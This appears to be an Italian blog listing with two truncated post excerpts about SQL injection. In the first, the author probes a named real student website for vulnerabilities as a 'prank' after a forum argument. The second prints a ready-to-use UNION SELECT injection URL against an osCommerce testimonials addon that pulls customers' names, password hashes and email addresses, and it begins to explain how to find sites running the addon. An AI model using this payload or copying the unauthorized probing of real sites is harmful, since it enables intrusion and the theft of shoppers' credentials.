weBlog
SQL injection - Un esempio pratico: studentidemocratici.it vulnerabile
Dopo un simpatico battibecco sul forum di studentidemocratici con tote_bari, mi era venuto un pruritino alle dita… una voglia di scherzetto! comincio a spulciare un po il phpBB ma risulta tutto patchato. Ed il resto del sito? “grafica & PHP coding powered by michele […]
osCommerce customers testimonials Sql injection
Di solito non segnalo bug già noti. Ma osCommerce è un CMS di vendita online ed un SQL inject su questo CMS permette di accedere ai dati degli utenti registrati su un determinato sito. La segnalazione del bug è su milw0rm
L’exploit consiste nell’iniettare una query sql tramite $_GET
http://www.vuln.oscommerce.com/customer_testimonials.php?testimonial_id=99999+union+select+1,2,concat(customers_lastname,0×3a,customers_password,0×3a,customers_email_address),4,5,6,7,8+from+customers/*
Per trovare siti con installato l’addon […]
